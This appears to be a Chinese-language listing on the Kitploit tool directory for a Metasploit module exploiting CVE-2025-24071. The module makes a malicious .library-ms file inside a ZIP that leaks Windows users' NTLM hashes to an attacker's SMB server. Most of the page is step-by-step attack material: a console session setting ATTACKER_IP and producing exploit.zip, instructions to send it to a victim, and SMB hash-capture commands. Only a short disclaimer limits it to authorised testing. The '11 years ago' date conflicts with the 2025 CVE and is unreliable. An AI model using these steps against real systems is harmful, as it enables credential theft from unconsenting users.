Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Blackash-CVE-2025-24071 — CVE-2025-24071 | Kitploit
工具/GitHubGitHub/zbs54/blackash-cve-2025-24071
漏洞利用框架Payload生成漏洞分析漏洞利用信息收集渗透测试
GitHubzbs54/blackash-cve-2025-24071

Blackash-CVE-2025-24071

CVE-2025-24071

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Blackash-CVE-2025-24071

CVE-2025-24071:通过 .library-ms 文件泄露 NTLM 哈希的 Metasploit 模块 🚨

描述

Windows 文件资源管理器将敏感信息暴露给未经授权的攻击者,使得未经授权的攻击者可以通过网络进行欺骗。

指标

CNA:Microsoft 公司 基础得分:6.5 中等 🟠 向量:CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

概述

当用户解压包含特制 .library-ms 文件的 ZIP 压缩包时,漏洞便会触发。Windows 资源管理器会自动向文件中指定的远程服务器发起 SMB 身份验证请求,从而在无需用户交互的情况下泄露用户的 NTLM 哈希。

此 Metasploit 模块会:

  1. 生成一个恶意的 .library-ms 文件。
  2. 将其打包成 ZIP 压缩包。
  3. 与 Metasploit 的 SMB 捕获功能集成,以收集 NTLM 哈希。
root@kitploit:~
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v6.4.64-dev                          ]
+ -- --=[ 2519 exploits - 1296 auxiliary - 431 post       ]
+ -- --=[ 1616 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use auxiliary/server/ntlm_hash_leak
msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 192.168.1.1
ATTACKER_IP => 192.168.1.1
msf6 auxiliary(server/ntlm_hash_leak) > set FILNAME exploit.zip
FILNAME => exploit.zip
msf6 auxiliary(server/ntlm_hash_leak) > set LIBRARY_NAME malicious.library-ms
LIBRARY_NAME => malicious.library-ms
msf6 auxiliary(server/ntlm_hash_leak) > set SHARE_NAME shared
set SHARE_NAME => shared
msf6 auxiliary(server/ntlm_hash_leak) > run
[*] Malicious ZIP file created: exploit.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed
下载工具

安装:

  1. 克隆仓库:
root@kitploit:~
git clone https://github.com/B1ack4sh/Blackash-CVE-2025-24071.git
cd CVE-2025-24071

用法:

  1. 加载模块:
root@kitploit:~
use auxiliary/server/ntlm_hash_leak
  1. 设置必需的选项:
root@kitploit:~
set ATTACKER_IP 192.168.1.162           # 替换为你的 IP 地址
set FILENAME exploit.zip                # 恶意 ZIP 文件的名称
set LIBRARY_NAME malicious.library-ms   # .library-ms 文件的名称
set SHARE_NAME shared                   # SMB 共享名称
  1. 运行模块:
root@kitploit:~
run
  1. 模块将生成一个恶意 ZIP 文件(exploit.zip)。将此文件提供给受害者下载并解压。
  2. 使用 Metasploit 的 SMB 捕获模块收集 NTLM 哈希:
root@kitploit:~
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162  # 与 ATTACKER_IP 相同
run

免责声明 ⚠️

仅用于教育和研究目的。仅在你拥有或获得测试许可的系统上使用。